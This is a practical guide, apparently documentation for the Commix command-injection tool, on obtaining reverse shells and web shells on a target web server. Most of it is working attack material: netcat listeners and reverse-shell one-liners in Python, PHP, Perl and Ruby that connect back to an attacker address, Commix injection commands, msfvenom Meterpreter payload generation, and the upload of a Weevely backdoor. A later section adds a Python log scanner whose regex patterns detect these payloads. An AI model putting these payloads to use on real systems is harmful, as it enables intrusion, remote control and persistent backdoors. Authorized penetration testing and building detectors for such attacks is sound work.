# Getting shells
This guide covers practical usage of reverse shells and web shells with Commix, a popular automated command injection exploitation tool. It includes multiple reverse shell techniques (Netcat-based and alternatives) and uploading/executing PHP-based web shells.
## Reverse shells

A reverse shell allows you to gain interactive shell access on a remote host by having that host connect back to your local machine.

### Netcat reverse shell

Overview: Netcat is a versatile networking utility, often referred to as the "Swiss-army knife" for TCP/IP. This method uses netcat on both attacker and victim to establish a reverse shell.
On your attacking machine, start netcat in listening mode on the chosen port (e.g., 1234):

```shell
nc -lvp 1234
```

Output example:

```
listening on [any] 1234 ...
```
Run commix with the `--os-cmd` option to launch netcat on the target, connecting back to your machine:

```shell
python commix.py --url="http://TARGET_IP/cmd/normal.php?addr=127.0.0.1" --os-cmd="nc -e /bin/sh YOUR_IP 1234"
```

Alternatively, depending on the netcat binary present on the target:

```shell
python commix.py --url="http://TARGET_IP/cmd/normal.php?addr=127.0.0.1" --os-cmd="/bin/nc.traditional -e /bin/sh YOUR_IP 1234"
```
### Interactive reverse TCP shell

Commix offers an interactive shell option for reverse TCP shells:

```shell
python commix.py --url="http://TARGET_IP/cmd/normal.php?addr=127.0.0.1"
```

Once inside the commix shell:

```
commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set LHOST YOUR_IP
commix(reverse_tcp) > set LPORT 1234
commix(reverse_tcp) > 1    # Choose Netcat reverse TCP shell
commix(reverse_tcp_netcat) > 3    # Choose Netcat-Traditional on target host
```
Your listener terminal will show the connection:

```
nc -lvp 1234
connect to [YOUR_IP] from TARGET_IP 36746
whoami
www-data
```
### Reverse shells without netcat

Sometimes netcat is not available on the target system. Use alternative reverse shell payloads written in scripting languages such as Python, PHP, Perl, or Ruby. These payloads initiate a reverse shell back to your machine without needing netcat.
Start netcat listening on your local machine as before:

```shell
nc -lvp 1234
```

Replace `YOUR_IP` and `1234` accordingly.
Python reverse shell:

```shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

PHP reverse shell:

```shell
php -r '$sock=fsockopen("YOUR_IP",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
```

Perl reverse shell:

```shell
perl -e 'use Socket;$i="YOUR_IP";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

Ruby reverse shell:

```shell
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("YOUR_IP",1234);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
Example for the Python reverse shell:

```shell
python commix.py --url="http://TARGET_IP/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --os-cmd="python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"
```
On your local listener terminal, the expected output is:

```
nc -lvp 1234
connect to [YOUR_IP] from TARGET_IP 43712
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
```
## Web shells

Web shells allow interactive command execution or file management via a web server, usually by uploading or creating a malicious script on the target.

### PHP Meterpreter via Metasploit

Generate the PHP payload with msfvenom:

```shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -e php/base64 -f raw > /root/Desktop/msfvenom.php
```
Note: add PHP tags manually to the file if they are not included:

```php
<?php
// Payload code here
?>
```
Open `msfconsole` and run:

```
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST YOUR_IP
set LPORT 4444
exploit
```
Upload the payload with commix and execute it on the target:

```shell
python commix.py --url="http://TARGET_IP/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/msfvenom.php" --file-dest="/var/www/msfvenom.php" --os-cmd="php -f /var/www/msfvenom.php"
```
Once the payload executes, Metasploit will open a session:

```
meterpreter > sysinfo
Computer    : target-hostname
OS          : Linux ...
Meterpreter : php/php
```
### Weevely

Generate a Weevely backdoor with the password `commix`:

```shell
weevely generate commix
```

Output:

```
[generate.php] Backdoor file 'weevely.php' created with password 'commix'
```
Upload the generated file with commix:

```shell
python commix.py --url="http://TARGET_IP/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/weevely.php" --file-dest="/var/www/html/cmd/"
```

Access the Weevely interface:

```shell
weevely http://TARGET_IP/cmd/weevely.php commix
```
Example session output:

```
www-data@target:/var/www/html/cmd$ ls -la
total 16
-rw-r--r-- 1 www-data www-data 606 May 18 02:02 weevely.php
```
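For the defending side, the following script is an added example (it is not part of this page or of the Commix project): it URL-decodes the query string of web-server access-log lines and flags the reverse-shell and web-shell invocation patterns shown above, falling back to a weaker shell-metacharacter check. The log lines, timestamps and IP addresses are constructed, and `analyze_line`/`scan_log` are hypothetical names.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log sample (Apache combined-style prefix); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [18/May/2025:02:01:11 +0000] "GET /cmd/normal.php?addr=127.0.0.1 HTTP/1.1" 200 312
10.0.0.9 - - [18/May/2025:02:02:03 +0000] "GET /cmd/normal.php?addr=127.0.0.1%3Bnc+-e+%2Fbin%2Fsh+198.51.100.7+1234 HTTP/1.1" 200 0
10.0.0.9 - - [18/May/2025:02:02:40 +0000] "GET /cmd/normal.php?addr=127.0.0.1%7Cphp+-f+%2Fvar%2Fwww%2Fmsfvenom.php HTTP/1.1" 200 0
10.0.0.9 - - [18/May/2025:02:03:10 +0000] "GET /cmd/normal.php?addr=%60python+-c+%27import+socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28%29%27%60 HTTP/1.1" 500 0
"""

# Signatures for the payload families shown on this page, applied after URL-decoding.
PATTERNS = {
    "netcat_reverse": re.compile(r"\bnc(\.traditional)?\s+(-\S+\s+)*-e\s+/bin/sh\b"),
    "python_socket": re.compile(r"\bpython\d?\s+-c\s+'?import\s+socket\b"),
    "php_fsockopen": re.compile(r"\bphp\s+-r\s+'?.*fsockopen\("),
    "perl_socket": re.compile(r"\bperl\s+-e\s+'?use\s+Socket;"),
    "ruby_tcpsocket": re.compile(r"\bruby\s+-rsocket\b"),
    "php_file_exec": re.compile(r"\bphp\s+-f\s+/\S+\.php\b"),
}
# Weaker fallback: shell metacharacters in a parameter value suggest an injection attempt.
SHELL_META = re.compile(r"[;|`&]|\$\(")

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)')


def analyze_line(line):
    """Return a finding dict for one log line, or None if nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = m.group("path").partition("?")[2]
    decoded = unquote_plus(query)          # payloads arrive URL-encoded in the query string
    hits = [name for name, rx in PATTERNS.items() if rx.search(decoded)]
    if not hits and SHELL_META.search(decoded):
        hits = ["shell_metachar"]
    if not hits:
        return None
    return {"src": m.group("src"), "ts": m.group("ts"), "hits": hits, "decoded": decoded}


def scan_log(text):
    """Scan a whole log and return the findings in order of appearance."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["src"], ",".join(f["hits"]), "->", f["decoded"])
```

Feed real access logs through `scan_log` to get the decoded parameter value alongside the matching signature, which is what an analyst needs to confirm the injection and identify the callback address.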
## Notes

- Replace `YOUR_IP` and `TARGET_IP` with the appropriate attacker and target IP addresses.
- Choose the reverse shell method based on the environment and the binaries available on the target.
- Use netcat where possible for simplicity; fall back to scripting languages if netcat is missing.
- Always validate your payload syntax for correct escaping and quoting.
- Use Metasploit or Weevely for advanced post-exploitation and persistence.
- Ensure your listener port is open and not blocked by firewalls.
- Respect legal and ethical guidelines when performing penetration testing.